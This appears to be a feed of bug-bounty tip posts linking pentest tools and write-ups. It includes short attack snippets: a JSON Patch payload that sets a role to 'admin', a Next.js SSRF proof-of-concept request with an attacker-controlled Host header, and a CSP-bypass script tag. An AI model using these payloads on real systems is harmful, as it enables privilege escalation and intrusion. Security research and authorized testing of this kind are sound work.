many APIs are vulnerable to 'JSON Patch' where you have access to the op, you can add, remove, replace, move, copy
example :
{ 'op': 'replace', 'path': '/role', 'value': 'admin' },
more info :
datatracker.ietf.org/doc/html/rfc69โฆ
jsonpatch.com
#BugBounty #bugbountytips
403JUMP
403JUMP is a tool designed for penetration testers and bug bounty hunters to audit the security of web applications. It aims to bypass HTTP 403 (Forbidden) pages using various techniques.
github.com/trap-bytes/403โฆ
#cybersecurity #infosec #pentest #bugbounty
Just got a reward for a high vulnerability submitted on YesWeHack โ ต -- Information Disclosure (CWE-200). #YesWeRHackers #bugbounty ๐ฅ
6 Tools for Hackers
#infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosec urity #cyberattacks #security #oscp #cybersecurity awareness #bugbounty #bugbounty tips
๐งจGraphQL Hacking Checklist
anmolksachan.github.io/graphql/
#bughunt ing #cybersecurity #bugbounty tips #bughunt #bugbounty #bugbounty tips
Advanced SQL Injection for AWAE
#BugBounty #bugbountytips
#SQLi
github.com/shreyaschavhanโฆ
Offensive Linux Security Tools
#infosec #cybersecurity #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosec urity #cyberattacks #security #oscp #cybersecurity awareness #bugbounty #bugbounty tips
Excited to share my journey on discovering my first Remote Code Execution (RCE)!
Check out the article here: mchklt.medium.com/how-i-found-myโฆ
#BugBounty #bugbountytips #cybersecuritytips #CyberSecurity
CVE-2024-34351 : Server-Side Request Forgery on Next.js
github.com/vercel/next.jsโฆ
assetnote.io/resources/reseโฆ
POC:
POST /x HTTP/2
Host: attacker*com
Content-Length: 2
Next-Action: xxxx
{}
#BugBounty #bugbountytips
You can now bypass CSP on any website that allows https://*.facebook.com in a default or script-src ๐ฅ๐?
PoC: <script src=graph.facebook.com/?id=1337%26calโฆ></script>
Exploitation is only possible using a novel technique we published:
octagon.net/blog/2022/05/2โฆ #bugbountytip #BugBounty
SSRFmap by Swissky ๎จ is a modular SSRF scanner written in Python3 ๐
It is capable of identifying all types of SSRF vulnerabilities!
Including the ones found in popular services like Redis Server, Github, Zabbix!
github.com/swisskyrepo/SSโฆ
#bugbountytips #BugBounty